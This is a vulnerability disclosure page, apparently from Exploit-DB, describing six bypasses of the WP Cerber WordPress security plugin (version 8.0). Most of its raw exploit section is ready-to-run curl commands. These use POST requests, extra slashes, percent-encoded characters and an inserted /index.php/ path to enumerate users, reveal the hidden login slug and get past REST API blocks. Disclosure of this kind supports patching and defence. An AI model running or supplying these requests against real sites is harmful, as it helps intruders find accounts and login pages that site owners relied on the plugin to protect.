WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities

vendor:

WordPress Cerber Security, Antispam & Malware Scan

by:

ed0x21son

N/A

CVSS

N/A

Multiple Bypass

Unknown

CWE

Product Name: WordPress Cerber Security, Antispam & Malware Scan

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested: Linux/WordPress 5.1

2019

WordPress Cerber Security, Antispam & Malware Scan – Multiple Bypass Vulnerabilities

There are multiple bypass vulnerabilities in the WordPress Cerber Security, Antispam & Malware Scan plugin. These vulnerabilities include:1. Stop user enumeration bypass: It is possible to bypass user enumeration protection by using the Post method instead of Get.2. Protect admin scripts bypass: Admin scripts protection can be bypassed by adding one or more slashes to the URI.3. Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass: This protection can be bypassed by encoding any character in the URI.4. Hide login URL bypass: The login URL can be bypassed by encoding any character in the URI, which will cause Cerber to return the secret slug in the Location header field.5. Stop user enumeration via REST API bypass: User enumeration can be bypassed by inserting /index.php/ between the domain and the REST route.6. Disable REST API bypass: Same as above.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities
# Type: WordPress Plugin
# Date: 2019-03-04
# Active installs: 100,000+
# Version: 8.0
# Software Link: https://wordpress.org/plugins/wp-cerber/
# Exploit Author: ed0x21son
# Category: WebApps, WordPress
# Tested on: Linux/WordPress 5.1

[Vulnerabilities]


#1: Stop user enumeration bypass:

U can bypass user enumeration protection if u use Post method instead of Get.

curl http://localhost/ -d author=1



#2: Protect admin scripts bypass:

U can bypass admin scripts protection if u add one or more slashes to the uri.

curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils'
curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar'



#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass:

U can bypass this protection if u encode any character in the uri.

curl http://localhost/wp-login%2ephp
curl -v http://localhost/wp-signup%2ephp
curl -v http://localhost/wp-register%2ephp



#4: Hide login URL bypass:

U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field.

curl -I http://localhost/wp-%61dmin/



#5: Stop user enumeration via REST API bypass:

U can bypass if u insert /index.php/ between domain and rest route.

curl http:/localhost/index.php/wp-json/wp/v2/users/



#6: Disable REST API bypass:

Same above.

curl http:/localhost/index.php/wp-json/wp/v2/



--ed0x21son